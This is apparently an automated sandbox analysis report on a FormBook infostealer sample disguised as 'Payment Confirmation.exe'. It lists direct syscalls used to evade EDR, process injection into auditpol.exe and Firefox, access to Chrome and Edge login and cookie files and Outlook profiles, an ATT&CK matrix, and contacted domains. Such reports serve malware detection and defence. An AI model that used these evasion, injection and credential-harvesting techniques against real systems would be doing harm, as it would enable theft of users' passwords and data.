                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA2B57 mov eax, dword ptr fs:[00000030h]7_2_01AA2B57
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA2B57 mov eax, dword ptr fs:[00000030h]7_2_01AA2B57
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26AA4 mov eax, dword ptr fs:[00000030h]7_2_01A26AA4
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4A80 mov eax, dword ptr fs:[00000030h]7_2_01AA4A80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A08A90 mov edx, dword ptr fs:[00000030h]7_2_01A08A90
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8AA0 mov eax, dword ptr fs:[00000030h]7_2_019D8AA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8AA0 mov eax, dword ptr fs:[00000030h]7_2_019D8AA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0AD0 mov eax, dword ptr fs:[00000030h]7_2_019D0AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0AAEE mov eax, dword ptr fs:[00000030h]7_2_01A0AAEE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0AAEE mov eax, dword ptr fs:[00000030h]7_2_01A0AAEE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26ACC mov eax, dword ptr fs:[00000030h]7_2_01A26ACC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26ACC mov eax, dword ptr fs:[00000030h]7_2_01A26ACC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26ACC mov eax, dword ptr fs:[00000030h]7_2_01A26ACC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A04AD0 mov eax, dword ptr fs:[00000030h]7_2_01A04AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A04AD0 mov eax, dword ptr fs:[00000030h]7_2_01A04AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0CA24 mov eax, dword ptr fs:[00000030h]7_2_01A0CA24
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0CA38 mov eax, dword ptr fs:[00000030h]7_2_01A0CA38
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F4A35 mov eax, dword ptr fs:[00000030h]7_2_019F4A35
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F4A35 mov eax, dword ptr fs:[00000030h]7_2_019F4A35
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FEA2E mov eax, dword ptr fs:[00000030h]7_2_019FEA2E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5CA11 mov eax, dword ptr fs:[00000030h]7_2_01A5CA11
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0A5B mov eax, dword ptr fs:[00000030h]7_2_019E0A5B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0A5B mov eax, dword ptr fs:[00000030h]7_2_019E0A5B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7EA60 mov eax, dword ptr fs:[00000030h]7_2_01A7EA60
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6A50 mov eax, dword ptr fs:[00000030h]7_2_019D6A50
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtQuerySystemInformation: Direct from: 0x772748CCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtQueryVolumeInformationFile: Direct from: 0x77272F2CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtOpenSection: Direct from: 0x77272E0CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtClose: Direct from: 0x77272B6C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtReadVirtualMemory: Direct from: 0x77272E8CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtCreateKey: Direct from: 0x77272C6CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtSetInformationThread: Direct from: 0x77272B4CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtQueryAttributesFile: Direct from: 0x77272E6CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtAllocateVirtualMemory: Direct from: 0x772748ECJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtQueryInformationToken: Direct from: 0x77272CACJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtTerminateThread: Direct from: 0x77272FCCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtOpenKeyEx: Direct from: 0x77272B9CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtDeviceIoControlFile: Direct from: 0x77272AECJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtAllocateVirtualMemory: Direct from: 0x77272BECJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtProtectVirtualMemory: Direct from: 0x77267B2EJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtCreateFile: Direct from: 0x77272FECJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtOpenFile: Direct from: 0x77272DCCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtWriteVirtualMemory: Direct from: 0x77272E3CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtMapViewOfSection: Direct from: 0x77272D1CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtResumeThread: Direct from: 0x772736ACJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtProtectVirtualMemory: Direct from: 0x77272F9CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtSetInformationProcess: Direct from: 0x77272C5CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtNotifyChangeKey: Direct from: 0x77273C2CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtCreateMutant: Direct from: 0x772735CCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtSetInformationThread: Direct from: 0x772663F9Jump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtQueryInformationProcess: Direct from: 0x77272C26Jump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtResumeThread: Direct from: 0x77272FBCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtCreateUserProcess: Direct from: 0x7727371CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtWriteVirtualMemory: Direct from: 0x7727490CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtOpenKeyEx: Direct from: 0x77273C9CJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtAllocateVirtualMemory: Direct from: 0x77272BFCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtReadFile: Direct from: 0x77272ADCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtQuerySystemInformation: Direct from: 0x77272DFCJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeNtDelayExecution: Direct from: 0x77272DDCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: NULL target: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: NULL target: C:\Windows\SysWOW64\auditpol.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: NULL target: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: NULL target: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\auditpol.exeThread register set: target process: 5156Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\auditpol.exeThread APC queued: target process: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"Jump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeProcess created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Users\user\Desktop\Payment Confirmation.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeQueries volume information: C:\Windows\Fonts\GILSANUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\auditpol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665536 Sample: Payment Confirmation.exe Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 31 www.tieniu09.xyz 2->31 33 www.globedesign.xyz 2->33 35 17 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 4 other signatures 2->53 10 Payment Confirmation.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\...\Payment Confirmation.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Payment Confirmation.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 yT3kwEipvxIo4KXERrb.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 auditpol.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 yT3kwEipvxIo4KXERrb.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 amazonas.uol.com.br 200.147.100.53, 49694, 80 UniversoOnlineSABR Brazil 23->37 39 stuhlmann.cloud 81.169.145.84, 49740, 49741, 49742 STRATOSTRATOAGDE Germany 23->39 41 7 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.